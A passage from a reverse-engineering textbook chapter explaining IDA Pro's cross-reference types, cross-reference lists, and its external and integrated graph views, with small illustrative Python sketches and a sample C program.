for example, are typically implemented by adding an offset to the starting

address of the array. As a result, the first address in most global arrays can

often be recognized by the presence of an offset cross-reference. For this rea-

son, most string data (strings being arrays of characters in C/C++) is the tar-

get of offset cross-references.
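
To tie the three data cross-reference types together, the following Python sketch rebuilds the cross-reference comments for the three global variables from the instruction addresses in Listing 9-1. It is a model only: the record layout, the function name xref_comment, and the arrow character are assumptions, and the up arrow is hard-coded because every referencing instruction here lies at a lower address than the data.

```python
MAIN = 0x401010  # start of _main in Listing 9-1

# (source address, target name, type suffix), transcribed from Listing 9-1
XREFS = [
    (0x401014, "ref_it", "o"),    # address taken
    (0x40101E, "read_it", "r"),   # read
    (0x40102B, "write_it", "w"),  # write
    (0x401035, "read_it", "r"),
    (0x40103E, "write_it", "w"),
    (0x40104A, "write_it", "w"),
]

def xref_comment(target, xrefs, limit=2):
    """Format the references to target, truncating at the display limit."""
    refs = ["_main+%X↑%s" % (src - MAIN, kind)
            for src, name, kind in xrefs if name == target]
    shown = "; ".join(refs[:limit])
    return "DATA XREF: " + shown + (" ..." if len(refs) > limit else "")

for name in ("read_it", "write_it", "ref_it"):
    print(name, "->", xref_comment(name, XREFS))
```

With the default limit of 2, write_it is the only variable whose list is truncated with an ellipsis, since it is the only one referenced three times.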

Unlike read and write cross-references, which can originate only from

instruction locations, offset cross-references can originate from either

instruction locations or data locations. A table of pointers (such as a vtable)

in a program’s data section is one example: IDA generates an offset

cross-reference from each entry in the table to the location to which that

entry points. You can

see this if you examine the vtable for class SubClass from Chapter 8, whose

disassembly is shown here:

.rdata:00408148 off_408148 dd offset SubClass::vfunc1(void) ; DATA XREF: SubClass::SubClass(void)+12↑o
.rdata:0040814C            dd offset BaseClass::vfunc2(void)
.rdata:00408150            dd offset SubClass::vfunc3(void)
.rdata:00408154            dd offset BaseClass::vfunc4(void)
.rdata:00408158            dd offset SubClass::vfunc5(void)

Here you see that the address of the vtable is used in the function

SubClass::SubClass(void), which is the class constructor. The header lines

for function SubClass::vfunc3(void), shown here, show the offset cross-

reference that links the function to a vtable.

.text:00401080 public: virtual void __thiscall SubClass::vfunc3(void) proc near
.text:00401080                                         ; DATA XREF: .rdata:00408150↓o

This example demonstrates one of the characteristics of C++ virtual func-

tions that becomes quite obvious when combined with offset cross-references,

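namely that C++ virtual functions are rarely called directly and are seldom

the target of a call cross-reference (direct calls occur only when the compiler

can resolve the target statically, as with an explicitly qualified call).

Instead, all C++ virtual functions should be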

referred to by at least one vtable entry and should always be the target of at

least one offset cross-reference. Remember that overriding a virtual function

is not mandatory. Therefore, a virtual function can appear in more than one

vtable, as discussed in Chapter 8. Backtracking offset cross-references is one

technique for easily locating C++ vtables in a program’s data section.

Cross-Reference Lists

With an understanding of what cross-references are, we can now discuss the

manner in which you may access all of this data within IDA. As mentioned

previously, the number of cross-reference comments that can be displayed

at a given location is limited by a configuration setting that defaults to 2. As

long as the number of cross-references to a location does not exceed this

limit, then working with those cross-references is fairly straightforward.

Mousing over the cross-reference text displays the disassembly of the source

region in a tool tip–style display, while double-clicking the cross-reference

address jumps the disassembly window to the source of the cross-reference.

There are two methods for viewing the complete list of cross-references

to a location. The first method is to open a cross-references subview associ-

ated with a specific address. By positioning the cursor on an address that is

the target of one or more cross-references and selecting View▸Open

Subviews▸Cross-References, you can open the complete list of

cross-references to a given location, as shown in Figure 9-3, which shows the

complete list of cross-references to variable write_it.

Figure 9-3: Cross-reference display window

The columns of the window indicate the direction (Up or Down) to the

source of the cross-reference, the type of cross-reference (using the type suf-

fixes discussed previously), the source address of the cross-reference, and the

corresponding disassembled text at the source address, including any com-

ments that may exist at the source address. As with other windows that display

lists of addresses, double-clicking any entry repositions the disassembly display

to the corresponding source address. Once opened, the cross-reference dis-

play window remains open and accessible via a title tab displayed along with

every other open subview’s title tab above the disassembly area.

The second way to access a list of cross-references is to highlight a name

that you are interested in learning about and choose Jump▸Jump to xref

(hotkey CTRL-X) to open a dialog that lists every location that references the

selected symbol. The resulting dialog, shown in Figure 9-4, is nearly identical

in appearance to the cross-reference subview shown in Figure 9-3. In this

case, the dialog was activated using the CTRL-X hotkey with the first instance

of write_it (.text:0040102B) selected.

Figure 9-4: Jump to cross-reference dialog

The primary difference in the two displays is behavioral. Being a modal

dialog,[1] the display in Figure 9-4 has buttons to interact with and terminate

the dialog. The primary purpose of this dialog is to select a referencing

location and jump to it. Double-clicking one of the listed locations dismisses the

dialog and repositions the disassembly window at the selected location. The

second difference between the dialog and the cross-reference subview is that

the former can be opened using a hotkey or context-sensitive menu from any

instance of a symbol, while the latter can be opened only when you position

the cursor on an address that is the target of a cross-reference and choose

View▸Open Subviews▸Cross-References. Another way of thinking about it

is that the dialog can be opened at the source of any cross-reference, while

the subview can be opened only at the destination of the cross-reference.

1. A modal dialog must be closed before you can continue normal interaction with the

underlying application. Modeless dialogs can remain open while you continue normal

interaction with the application.

An example of the usefulness of cross-reference lists might be to rapidly

locate every location from which a particular function is called. Many people

consider the use of the C strcpy[2] function to be dangerous. Using

cross-references, locating every call to strcpy is as simple as finding any one call to

strcpy, using the CTRL-X hotkey to bring up the cross-reference dialog, and

working your way through every call cross-reference. If you don’t want to take

the time to find strcpy used somewhere in the binary, you can even get away

with adding a comment with the text strcpy in it and activating the

cross-reference dialog using the comment.[3]

Function Calls

A specialized cross-reference listing dealing exclusively with function calls

is available by choosing View▸Open Subviews▸Function Calls. Figure 9-5

shows the resulting dialog, which lists all locations that call the current func-

tion (as defined by the cursor location at the time the view is opened) in the

upper half of the window and all calls made by the current function in the

lower half of the window.

Figure 9-5: Function calls window

Here again, each listed cross-reference can be used to quickly reposition

the disassembly listing to the corresponding cross-reference location.

Restricting ourselves to considering function call cross-references allows us to think

about more abstract relationships than simple mappings from one address to

another and instead consider how functions relate to one another. In the

next section, we show how IDA takes advantage of this by providing several

types of graphs, all designed to assist you in interpreting a binary.

2. The C strcpy function copies a source array of characters, up to and including the associated

null termination character, to a destination array, with no checks whatsoever that the destination

array is large enough to hold all of the characters from the source.

3. When a symbol name appears in a comment, IDA treats that symbol just as if it were an operand

in a disassembled instruction. Double-clicking the symbol repositions the disassembly window,

and the right-click context-sensitive menu becomes available.
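
The two halves of the Function Calls window, callers above and callees below, amount to indexing the same set of call cross-references in two directions. A minimal Python sketch of that idea follows. The list of call pairs is hypothetical (helper does not appear in the sample program), and function_calls is an illustrative name rather than an IDA API.

```python
from collections import defaultdict

# Hypothetical call cross-references: (calling function, called function).
CALL_XREFS = [
    ("_main", "callflow"),
    ("_main", "callflow"),
    ("_main", "helper"),      # hypothetical extra function for illustration
    ("helper", "callflow"),
]

def function_calls(call_xrefs):
    """Index call cross-references by target (callers) and source (callees)."""
    callers, callees = defaultdict(list), defaultdict(list)
    for src, dst in call_xrefs:
        callers[dst].append(src)   # who calls dst?
        callees[src].append(dst)   # what does src call?
    return callers, callees

callers, callees = function_calls(CALL_XREFS)
print("callers of callflow:", callers["callflow"])
print("called by helper:", callees["helper"])
```

Each call site is kept as a separate entry, so a function that is called twice from the same caller is listed twice, just as two distinct cross-references would be.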

IDA Graphing

Because cross-references relate one address to another, they are a natural

place to begin if we want to make graphs of our binaries. By restricting our-

selves to specific types of cross-references, we can derive a number of useful

graphs for analyzing our binaries. For starters, cross-references serve as the

edges (the lines that connect points) in our graphs. Depending on the type

of graph we wish to generate, individual nodes (the points in the graph) can

be individual instructions, groups of instructions called basic blocks, or entire

functions. IDA has two distinct graphing capabilities: an external graphing

capability utilizing a bundled graphing application and an integrated, inter-

active graphing capability. Both of these graphing capabilities are covered in

the following sections.

IDA External (Third-Party) Graphing

IDA’s external graphing capability utilizes third-party graphing applications

to display IDA-generated graph files. Windows versions of IDA prior to 6.1

ship with a bundled graphing application named wingraph32.[4] For IDA 6.0,

non-Windows versions of IDA are configured to use the dotty[5] graph viewer

by default. Beginning with IDA 6.1, all versions of IDA ship with and are

configured to use the qwingraph[6] graph viewer, which is a cross-platform Qt

port of wingraph32. While the dotty configuration options remain visible for

Linux users, they are commented out by default. The graph viewer used

by IDA may be configured by editing the GRAPH_VISUALIZER variable in

<IDADIR>/cfg/ida.cfg.

Whenever an external-style graph is requested, the source for the graph

is generated and saved to a temporary file; then the designated third-party

graph viewer is launched to display the graph. IDA supports two graph

specification languages, Graph Description Language[7] (GDL) and the DOT[8]

language utilized by the graphviz[9] project. The graph specification language used

by IDA may be configured by editing the GRAPH_FORMAT variable in <IDADIR>/

cfg/ida.cfg. Legal values for this variable are DOT and GDL. You must ensure that

the language you specify here is compatible with the viewer you have speci-

fied in GRAPH_VISUALIZER.

4. Hex-Rays makes the source for wingraph32 available at http://www.hex-rays.com/idapro/freefiles/wingraph32_src.zip.

5. dotty is a graph viewing tool included as part of the graphviz project.

6. Hex-Rays makes the source for qwingraph available at http://www.hex-rays.com/idapro/freefiles/qwingraph_src.zip.

7. A GDL reference can be found at http://www.absint.com/aisee/manual/windows/node58.html.

8. A DOT reference can be found at http://www.graphviz.org/doc/info/lang.html.

9. See http://www.graphviz.org/.
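
For readers who have not seen a graph specification language, the sketch below emits a tiny graph in DOT syntax from a list of directed edges. It illustrates only the general shape of a DOT file and makes no claim about the exact text IDA generates; the function to_dot, the graph name, and the node names are all hypothetical.

```python
def to_dot(name, edges):
    """Render directed edges as DOT source text."""
    lines = ["digraph %s {" % name]
    for src, dst in edges:
        # Quoting node names keeps unusual characters in symbols legal.
        lines.append('    "%s" -> "%s";' % (src, dst))
    lines.append("}")
    return "\n".join(lines)

# Hypothetical function names used purely as node labels.
edges = [("main", "helper_a"), ("main", "helper_b"), ("helper_a", "helper_b")]
print(to_dot("calls", edges))
```

Saving the printed text to a file and opening it with any DOT-aware viewer from the graphviz project should display the three nodes and their connecting arrows.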

Five types of graphs may be generated from the View▸Graphs submenu.

Available external mode graphs include the following:

- Function flowchart

- Call graph for the entire binary

- Graph of cross-references to a symbol

- Graph of cross-references from a symbol

- Customized cross-reference graph

For two of these, the flowchart and the call graph, IDA is capable of gen-

erating and saving GDL (not DOT) files for use independently of IDA. These

options may be found on the File▸Produce file submenu. Saving the

specification file for other types of graphs may be possible if your configured graph

viewer allows you to save the currently displayed graph. A number of limita-

tions exist when dealing with any external graph. First and foremost is the

fact that external graphs are not interactive. Manipulation of displayed exter-

nal graphs is limited by the capabilities of your chosen external graph viewer

(often only zooming and panning).

External Flowcharts

With the cursor positioned within a function, View▸Graphs▸Flow

Chart (hotkey F12) generates and displays an external flowchart. The

flowchart display is the external graph that most closely resembles IDA’s

integrated graph-based disassembly view. These are not the flowcharts you may

have been taught during an introductory programming class. Instead, these

graphs might better be named “control flow graphs,” as they group a

function’s instructions into basic blocks and use edges to indicate flow from one

block to another.

BASIC BLOCKS

In a computer program, a basic block is a grouping of one or more instructions

with a single entry to the beginning of the block and a single exit from the end of

the block. In general, other than the last instruction, every instruction within a basic

block transfers control to exactly one successor instruction within the block. Similarly,

other than the first instruction, every instruction in a basic block receives control from

exactly one predecessor instruction within the block. For the purposes of basic block

determination, the fact that function call instructions transfer control outside the

current function is generally ignored unless it is known that the function being called

fails to return normally. An important behavioral characteristic of basic blocks is that

once the first instruction in a basic block is executed, the remainder of the block is

guaranteed to execute to completion. This can factor significantly into runtime

instrumentation of a program, since it is no longer necessary to set a breakpoint on every

instruction in a program or even single-step the program in order to record which

instructions have executed. Instead, breakpoints can be set on the first instruction of

each basic block, and as each breakpoint is hit, every instruction in its associated

block can be marked as executed. The Process Stalker component of Pedram Amini’s

PaiMei* framework performs in exactly this manner.

*Please see http://pedram.redhive.com/code/paimei/.

Figure 9-6 shows a portion of the flowchart of a relatively simple func-

tion. As you can see, external flowcharts offer very little in the way of address

information, which can make it difficult to correlate the flowchart view to its

corresponding disassembly listing.

Figure 9-6: External flowchart graph

Flowchart graphs are derived by following the ordinary and jump flows for

each instruction in a function, beginning with the entry point to the function.
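
As a rough illustration of how following ordinary and jump flows partitions a function into basic blocks, the sketch below applies the classic "leader" approach to the instructions of _main from Listing 9-1. This is a textbook technique and not necessarily how IDA computes its flowcharts; the tuple layout and the function name basic_blocks are assumptions, and calls are deliberately not treated as block terminators.

```python
# (address, mnemonic, branch target or None), transcribed from Listing 9-1.
INSNS = [
    (0x401010, "push", None), (0x401011, "mov", None),
    (0x401013, "push", None), (0x401014, "mov", None),
    (0x40101B, "mov", None),  (0x40101E, "mov", None),
    (0x401024, "mov", None),  (0x401026, "mov", None),
    (0x401029, "mov", None),  (0x40102B, "mov", None),
    (0x401030, "call", None), (0x401035, "cmp", None),
    (0x40103C, "jnz", 0x40104A),
    (0x40103E, "mov", None),
    (0x401048, "jmp", 0x401054),
    (0x40104A, "mov", None),
    (0x401054, "call", None), (0x401059, "xor", None),
    (0x40105B, "mov", None),  (0x40105D, "pop", None),
    (0x40105E, "retn", None),
]

BRANCHES = {"jmp", "jnz"}           # only the branches used in this listing
ENDS_BLOCK = BRANCHES | {"retn"}    # calls do not end a block in this model

def basic_blocks(insns):
    """Split a linear instruction list into basic blocks."""
    leaders = {insns[0][0]}                  # function entry point
    for i, (addr, mnem, target) in enumerate(insns):
        if mnem in BRANCHES:
            leaders.add(target)              # a jump target starts a block
        if mnem in ENDS_BLOCK and i + 1 < len(insns):
            leaders.add(insns[i + 1][0])     # so does whatever follows
    blocks, current = [], []
    for insn in insns:
        if insn[0] in leaders and current:
            blocks.append(current)
            current = []
        current.append(insn)
    blocks.append(current)
    return blocks

for block in basic_blocks(INSNS):
    print("%X-%X (%d instructions)" % (block[0][0], block[-1][0], len(block)))
```

For this function the model yields four blocks: the code up to the jnz, the two arms of the if statement, and the common tail that begins at loc_401054.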

External Call Graphs

A function call graph is useful for gaining a quick understanding of the hier-

archy of function calls made within a program. Call graphs are generated

by creating a graph node for each function and then connecting function

nodes based on the existence of a call cross-reference from one function to

another. The process of generating a call graph for a single function can be

viewed as a recursive descent through all of the functions that are called from

the initial function. In many cases, it is sufficient to stop descending the call

tree once a library function is reached, as it is easier to learn how the library

function operates by reading documentation associated with the library

rather than by attempting to reverse engineer the compiled version of the

function. In fact, in the case of a dynamically linked binary it is not possible

to descend into library functions, since the code for such functions is not

present within the dynamically linked binary. Statically linked binaries present

a different challenge when generating graphs. Since statically linked binaries

contain all of the code for the libraries that have been linked to the program,

related function call graphs can become extremely large.

In order to discuss function call graphs, we make use of the following

trivial program that does nothing other than create a simple hierarchy of

function calls:

#include <stdio.h>

void depth_2_1() {
   printf("inside depth_2_1\n");
}

void depth_2_2() {
   fprintf(stderr, "inside depth_2_2\n");
}

void depth_1() {
   depth_2_1();
   depth_2_2();
   printf("inside depth_1\n");
}

int main() {
   depth_1();
}

After compiling a dynamically linked binary using GNU gcc, we can ask

IDA to generate a function call graph using View▸Graphs▸Function Calls,

which should yield a graph similar to that shown in Figure 9-7. In this instance

we have truncated the left side of the graph somewhat in order to offer a bit

more detail. The call graph associated with the main function can be seen

within the circled area in the figure.

Figure 9-7: External function call graph
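
The recursive descent used to build a call graph for a single function can be sketched as follows. The call map is written by hand from the C source above, so it names printf and fprintf as the library functions; a compiled binary may reference different library routines. The names CALLS, LIBRARY, and call_graph are hypothetical, and the descent simply stops at anything listed as a library function.

```python
# Calls made by each function, read off the C source of the sample program.
CALLS = {
    "main": ["depth_1"],
    "depth_1": ["depth_2_1", "depth_2_2", "printf"],
    "depth_2_1": ["printf"],
    "depth_2_2": ["fprintf"],
}
# Library functions: their code is absent from a dynamically linked binary.
LIBRARY = {"printf", "fprintf"}

def call_graph(root, calls, library, edges=None, seen=None):
    """Collect (caller, callee) edges reachable from root, depth first."""
    edges = [] if edges is None else edges
    seen = set() if seen is None else seen
    if root in seen:              # guards against recursive call cycles
        return edges
    seen.add(root)
    for callee in calls.get(root, []):
        edges.append((root, callee))
        if callee not in library:     # do not descend into library code
            call_graph(callee, calls, library, edges, seen)
    return edges

for caller, callee in call_graph("main", CALLS, LIBRARY):
    print(caller, "->", callee)
```

Emptying LIBRARY and adding the library's own calls to CALLS models the statically linked case, where the descent continues into library code and the edge list grows accordingly.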

Alert readers may notice that the compiler has substituted calls to puts

and fwrite for printf and fprintf, respectively, as they are more efficient

when printing static strings. Note that IDA utilizes different colors to

represent different types of nodes in the graph, though the colors are not

configurable in any way.[10]

Given the straightforward nature of the previous program listing, why

does the graph appear to be twice as crowded as it should be? The answer is

that the compiler, as virtually all compilers do, has inserted wrapper code

responsible for library initialization and termination as well as for configur-

ing parameters properly prior to transferring control to the main function.

Attempting to graph a statically linked version of the same program

results in the nasty mess shown in Figure 9-8.

The graph in Figure 9-8 demonstrates a behavior of external graphs

in general, namely that they are always scaled initially to display the entire

graph, which can result in very cluttered displays. For this particular graph,

the status bar at the bottom of the WinGraph32 window indicates that there

are 946 nodes and 10,125 edges that happen to cross over one another in

100,182 locations. Other than demonstrating the complexity of statically

linked binaries, this graph is all but unusable. No amount of zooming and

panning will simplify the graph, and beyond that, there is no way to easily

locate a specific function such as main other than by reading the label on each

node. By the time you have zoomed in enough to be able to read the labels

associated with each node, only a few dozen nodes will fit within the display.

Figure 9-8: Function call graph in a statically linked binary

External Cross-Reference Graphs

Two types of cross-reference graphs can be generated for global symbols

(functions or global variables): cross-references to a symbol (View▸Graphs▸Xrefs To)

and cross-references from a symbol (View▸Graphs▸Xrefs From).

To generate an Xrefs To graph, a recursive ascent is performed by backtrack-

ing all cross-references to the selected symbol until a symbol to which no other

symbols refer is reached. When analyzing a binary, you can use an Xrefs To

graph to answer the question, “What sequence of calls must be made to

reach this function?” Figure 9-9 shows the use of an Xrefs To graph to display

the paths that can be followed to reach the puts function.

10. The graphs depicted in this chapter have been edited outside of IDA to remove node

coloring for the purposes of improving readability.

Figure 9-9: Xrefs To graph

Similarly, Xrefs To graphs can assist you in visualizing all of the locations

that reference a global variable and the chain of function calls required to

reach those locations. Cross-reference graphs are the only graphs capable of

incorporating data cross-reference information.
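The recursive ascent behind an Xrefs To graph can be sketched in a few lines of Python. This is an illustration only, not IDA's implementation: the CALLS table is a hand-written model of the example program (using the compiler's puts and fwrite substitutions and omitting the startup wrapper code), and the names CALLS and xrefs_to are assumptions made for the sketch.

```python
# Hand-built model of the example program's call edges (caller -> callees).
# This table is an assumption for illustration; IDA derives it from the binary.
CALLS = {
    "main": ["depth_1"],
    "depth_1": ["depth_2_1", "depth_2_2", "puts"],
    "depth_2_1": ["puts"],
    "depth_2_2": ["fwrite"],
}

def xrefs_to(target, calls):
    """Return the set of (caller, callee) edges on any path that reaches target."""
    # Invert the table so each function maps to the functions that call it.
    callers = {}
    for caller, callees in calls.items():
        for callee in callees:
            callers.setdefault(callee, set()).add(caller)

    edges, seen, stack = set(), {target}, [target]
    while stack:
        node = stack.pop()
        for caller in callers.get(node, ()):
            edges.add((caller, node))
            if caller not in seen:  # guard against recursive call cycles
                seen.add(caller)
                stack.append(caller)
    return edges

# Every edge printed lies on some call path that ends at puts.
for caller, callee in sorted(xrefs_to("puts", CALLS)):
    print(f"{caller} -> {callee}")
```

The ascent stops on its own at main because, in this simplified model, nothing refers to main.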

In order to create an Xrefs From graph, a recursive descent is performed

by following cross-references from the selected symbol. If the symbol is a

function name, only call references from the function are followed, so data

references to global variables do not show up in the graph. If the symbol is

an initialized global pointer variable (meaning that it actually points to some-

thing), then the corresponding data offset cross-reference is followed. When

you graph cross-references from a function, the effective behavior is a func-

tion call graph rooted at the selected function, as shown in Figure 9-10.

Unfortunately, the same cluttered graph problems exist when graphing

functions with a complex call graph.
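As a rough sketch of the recursive descent just described, the following Python models cross-references as (target, kind) pairs and follows only call references when the starting symbol is a function. The XREFS table and the xrefs_from name are assumptions for illustration; the data reference to stderr is included only to show that it is skipped.

```python
# Hand-built cross-references for the example program: (target, kind) pairs.
# "call" marks a call reference; "data" marks a data reference (depth_2_2
# passes stderr to its output routine, so it reads that global).
XREFS = {
    "main": [("depth_1", "call")],
    "depth_1": [("depth_2_1", "call"), ("depth_2_2", "call"), ("puts", "call")],
    "depth_2_1": [("puts", "call")],
    "depth_2_2": [("stderr", "data"), ("fwrite", "call")],
}

def xrefs_from(root, xrefs):
    """Return the call edges reachable from the function named root."""
    edges, seen, stack = set(), {root}, [root]
    while stack:
        node = stack.pop()
        for target, kind in xrefs.get(node, ()):
            if kind != "call":  # data references are not followed
                continue
            edges.add((node, target))
            if target not in seen:
                seen.add(target)
                stack.append(target)
    return edges

for caller, callee in sorted(xrefs_from("depth_1", XREFS)):
    print(f"{caller} -> {callee}")
```

Starting from depth_1, the result is the call graph rooted at that function; stderr never appears because only call references are followed.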

Figure 9-10: Xrefs From graph

Custom Cross-Reference Graphs

Custom cross-reference graphs, called User xref charts in IDA, provide the

maximum flexibility in generating cross-reference graphs to suit your needs.

In addition to combining cross-references to a symbol and cross-references

from a symbol into a single graph, custom cross-reference graphs allow you

to specify a maximum recursion depth and the types of symbols that should

be included or excluded from the resulting graph.

ViewGraphsUser Xrefs Chart opens the graph customization dialog

shown in Figure 9-11. Each global symbol that occurs within the specified

address range appears as a node within the resulting graph, which is con-

structed according to the options specified in the dialog. In the most com-

mon case, generating cross-references from a single symbol, the start and

end addresses are identical. If the start and end addresses differ, then the

resulting graph is generated for all nonlocal symbols that occur within the

specified range. In the extreme case where the start address is the lowest

address in the database and the end address is the highest address in the

database, the resulting graph degenerates to the function call graph for the

entire binary.

Figure 9-11: User cross-reference graph dialog

The options that are selected in Figure 9-11 represent the default

options for all custom cross-reference graphs. Following is a description of

the purpose of each set of options:

Starting direction

Options allow you to decide whether to search for cross-references from

the selected symbol, to the selected symbol, or both. If all other options

are left at their default settings, restricting the starting direction to Cross

references to results in an Xrefs To–style graph, while restricting direc-

tion to Cross references from generates an Xrefs From–style graph.

Parameters

The Recursive option enables recursive descent (Xrefs From) or ascent

(Xrefs To) from the selected symbols. Follow only current direction

forces any recursion to occur in only one direction. In other words, if

this option is selected, and node B is discovered to be reachable from

node A, the recursive descent into B adds additional nodes that can be

reached only from node B. Newly discovered nodes that refer to node B

will not be added to the graph. If you choose to deselect Follow only cur-

rent direction, then when both starting directions are selected, each new

node added to the graph is recursed in both the to and from directions.

Recursion depth

This option sets the maximum recursion depth and is useful for limiting

the size of generated graphs. A setting of −1 causes recursion to proceed

as deep as possible and generates the largest possible graphs.

Ignore

These options dictate what types of nodes will be excluded from the gen-

erated graph. This is another means of restricting the size of the result-

ing graph. In particular, ignoring cross-references from library functions

can lead to drastic simplifications of graphs in statically linked binaries.

The trick is to make sure that IDA recognizes as many library functions

as possible. Library code recognition is the subject of Chapter 12.

Print options

These options control two aspects of graph formatting. Print comments

causes any function comments to be included in a function’s graph

node. If Print recursion dots is selected and recursion would continue

beyond the specified recursion limit, a node containing an ellipsis is dis-

played to indicate that further recursion is possible.
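The way these options interact can be sketched as a breadth-first traversal. The code below is a simplified model, not IDA's algorithm: the function and parameter names are invented, CALLS is a hand-built table for the example program, the Ignore and Print comments options are not modeled, and the depth is interpreted as the maximum distance from the starting symbol, which may not match IDA's exact counting.

```python
from collections import deque

# Hand-built call edges for the example program (an assumption for illustration).
CALLS = {
    "main": ["depth_1"],
    "depth_1": ["depth_2_1", "depth_2_2", "puts"],
    "depth_2_1": ["puts"],
    "depth_2_2": ["fwrite"],
}

def user_xref_chart(start, calls, to=True, frm=True, recursive=True,
                    follow_current_only=True, depth=-1, dots=True):
    """Collect the (source, destination) edges of a custom xref graph."""
    # Inverse table (callee -> callers) for the "to" direction.
    callers = {}
    for caller, callees in calls.items():
        for callee in callees:
            callers.setdefault(callee, set()).add(caller)

    def neighbors(node, direction):
        table = calls if direction == "from" else callers
        return sorted(table.get(node, ()))

    directions = [d for d, enabled in (("to", to), ("from", frm)) if enabled]
    edges = set()
    queued = {(start, d) for d in directions}
    queue = deque((start, d, 1) for d in directions)
    while queue:
        node, direction, level = queue.popleft()
        for other in neighbors(node, direction):
            edges.add((node, other) if direction == "from" else (other, node))
            if not recursive:
                continue
            if depth != -1 and level >= depth:
                # Limit reached: add an ellipsis node if more references exist
                # in the current direction and will not be expanded elsewhere.
                if dots and (other, direction) not in queued \
                        and neighbors(other, direction):
                    edges.add((other, "...") if direction == "from"
                              else ("...", other))
                continue
            # Recurse in the current direction only, or in every selected one.
            for d in ([direction] if follow_current_only else directions):
                if (other, d) not in queued:
                    queued.add((other, d))
                    queue.append((other, d, level + 1))
    return edges

for edge in sorted(user_xref_chart("depth_1", CALLS, depth=1)):
    print(edge)
```

Calling the function with to=False approximates an Xrefs From graph, and frm=False approximates an Xrefs To graph. Clearing follow_current_only with both directions enabled pulls in siblings such as depth_2_2 when starting from depth_2_1.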

Figure 9-12 shows a custom cross-reference graph generated for function

depth_1 in our example program using default options and a recursion depth

of 1.

Figure 9-12: User xref graph for function depth_1

User-generated cross-reference graphs are the most powerful external-

mode graphing capability available in IDA. External flowcharts have largely

been superseded by IDA’s integrated graph-based disassembly view, and the

remaining external graph types are simply canned versions of user-generated

cross-reference graphs.

IDA’s Integrated Graph View

With version 5.0, IDA introduced a long-awaited interactive, graph-based dis-

assembly view that was tightly integrated into IDA. As mentioned previously,

the integrated graphing mode provides an alternative interface to the stan-

dard text-style disassembly listing. While in graph mode, disassembled func-

tions are displayed as control flow graphs similar to external-style flowchart

graphs. Because a function-oriented control flow graph is used, only one

function at a time can be displayed while in graph mode, and graph mode

cannot be used for instructions that lie outside any function. For cases in

which you wish to view several functions at once, or when you need to view

instructions that are not part of a function, you must revert to the text-ori-

ented disassembly listing.

We detailed basic manipulation of the graph view in Chapter 5, but we

reiterate a few points here. Switching between text view and graph view is

accomplished by pressing the spacebar or right-clicking anywhere in the dis-

assembly window and selecting either Text View or Graph View as appropri-

ate. The easiest way to pan around the graph is to click the background of

the graph view and drag the graph in the appropriate direction. For large

graphs, you may find it easier to pan using the Graph Overview window

instead. The Graph Overview window always displays a dashed rectangle

around the portion of the graph currently being displayed in the disassembly

window. At any time, you can click and drag the dashed rectangle to reposi-

tion the graph display. Because the graph overview window displays a minia-

ture version of the entire graph, using it for panning eliminates the need to

constantly release the mouse button and reposition the mouse as required

when panning across large graphs in the disassembly window.

There are no significant differences between manipulating a disassembly

in graph mode and manipulating a disassembly in text mode. Double-click

navigation continues to work as you would expect it to, as does the navigation

history list. Any time you navigate to a location that does not lie within a func-

tion (such as a global variable), the display will automatically switch to text

mode. Graph mode will automatically be restored once you navigate back to

a function. Access to stack variables is identical to that of text mode, with the

summary stack view being displayed in the root basic block of the displayed

function. Detailed stack frame views are accessed by double-clicking any stack

variable, just as in text mode. All options for formatting instruction oper-

ands in text mode remain available and are accessed in the same manner in

graph mode.

The primary user interface change related to graph mode deals with the

handling of individual graph nodes. Figure 9-13 shows a simple graph node

and its related title bar button controls.

Figure 9-13: Typical expanded graph view node

From left to right, the three buttons on the node’s title bar allow you to

change the background color of the node, assign or change the name of the

node, and access the list of cross-references to the node. Coloring nodes is a

useful way to remind yourself that you have already analyzed a node or to

simply make it stand out from others, perhaps because it contains code of

particular interest. Once you assign a node a color, the color is also used as

the background color for the corresponding instructions in text mode. To

easily remove any coloring, right-click the node’s title bar and select Set node

color to default.

The middle button on the title bar in Figure 9-13 is used to assign a

name to the address of the first instruction of the node’s basic block. Since

basic blocks are often the target of jump instructions, many nodes may

already have a dummy name assigned as the result of being targeted by a

jump cross-reference. However, it is possible for a basic block to begin with-

out having a name assigned. Consider the following lines of code:

.text:00401041 (X)  jg      short loc_401053
.text:00401043 (Y)  mov     ecx, [ebp+arg_0]

The instruction at X has two potential successors, loc_401053 and the

instruction at Y. Because it has two successors, X must terminate a basic

block, which results in Y becoming the first instruction in a new basic block,

even though it is not targeted explicitly by a jump and thus has no dummy

name assigned.
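The rule at work here (a jump ends a basic block, so both its target and the instruction that follows it begin new blocks) can be illustrated with a small Python sketch. The LISTING rows beyond the two instructions shown above are invented for the example, and block_leaders is a hypothetical helper, not an IDA API.

```python
# (address, mnemonic, jump target or None). The first two rows mirror the
# listing above; the last two are invented to round out the example.
LISTING = [
    (0x401041, "jg", 0x401053),
    (0x401043, "mov", None),
    (0x401046, "add", None),
    (0x401053, "xor", None),
]

def block_leaders(listing):
    """Return {address: reason} for each instruction that starts a basic block."""
    addresses = [addr for addr, _, _ in listing]
    leaders = {addresses[0]: "first instruction"}
    for index, (_, _, target) in enumerate(listing):
        if target is None:
            continue
        # The instruction after a jump starts a block even though nothing
        # jumps to it, so it receives no dummy name.
        if index + 1 < len(listing):
            leaders.setdefault(addresses[index + 1], "fall-through after jump")
        # A jump target starts a block and is what earns a loc_ dummy name.
        if target in addresses:
            leaders[target] = "jump target"
    return leaders

for addr, reason in sorted(block_leaders(LISTING).items()):
    label = f"loc_{addr:X}" if reason == "jump target" else "unnamed"
    print(f"{addr:08X}  {reason:<24} {label}")
```

In this model the mov at 00401043 is reported as a block leader without a name, which is exactly the case the middle title bar button is meant to handle.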

The rightmost button in Figure 9-13 is used to access the list of cross-

references that target the node. Since cross-reference comments are not dis-

played by default in graph mode, this is the easiest way to access and navigate

to any location that references the node. Unlike the cross-reference lists we

have discussed previously, the generated node cross-reference list also con-

tains an entry for the ordinary flow into the node (designated by type ^). This

is required because it is not always obvious in graph view which node is the

linear predecessor of a given node. If you wish to view normal cross-reference

comments in graph mode, access the Cross-References tab under Options▸General

and set the Number of displayed xrefs option to something other

than zero.

Nodes within a graph may be grouped either by themselves or with other

nodes in order to reduce some of the clutter in a graph. To group multiple

nodes, CTRL-click the title bar of each node to be grouped and then right-

click the title bar of any selected node and select Group nodes. You will be

prompted to enter some text (defaults to the first instruction in the group) to

be displayed in the collapsed node. Figure 9-14 shows the result of grouping

the node in Figure 9-13 and changing the node text to collapsed node demo.

Figure 9-14: Typical collapsed (grouped) graph view node

Note that two additional buttons are now present in the title bar. In left-

to-right order, these buttons allow you to uncollapse (expand) the grouped

node and edit the node text. Uncollapsing a node merely expands the nodes

